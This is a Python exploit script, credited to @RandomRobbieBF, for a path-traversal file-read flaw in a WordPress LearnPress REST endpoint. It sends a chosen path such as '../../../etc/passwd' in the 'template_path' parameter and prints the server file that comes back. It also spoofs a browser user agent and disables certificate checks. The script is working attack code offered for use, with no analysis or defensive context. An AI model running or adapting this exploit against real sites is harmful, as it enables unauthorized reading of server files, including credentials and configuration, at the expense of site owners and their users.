import requests
import argparse
import json
import os

#
# Exploit script by @RandomRobbieBF
#

http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

# Set a real user agent
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
}

parser = argparse.ArgumentParser()
parser.add_argument("-u","--url", required=True,help="WordPress URL e.g. https://example.com")
parser.add_argument("-f","--file", required=True,help="File path to retrieve e.g. ../../../etc/passwd")
args = parser.parse_args() 

endpoint = f"{args.url}/wp-json/lp/v1/courses/archive-course"

query = {
  "template_path": args.file, 
  "return_type": "html"
}

requests.packages.urllib3.disable_warnings()

try:
  response = requests.get(endpoint, params=query, verify=False,headers=headers)
  
  data = json.loads(response.text)
  if response.status_code != 200:
     print("Status code:   %i" % response.status_code)
     print("Response body: %s" % response.content)
  if "No route was found matching the URL and request method" in response.text:
     print("No route was found matching the URL and request method")
     exit()
  if data['status'] == 'success':
    content = data['data']['content']
    print(content)
  else:
    print(f"Error: {data['message']}")
    
except requests.exceptions.RequestException as e:
  print(f"Error: {e}")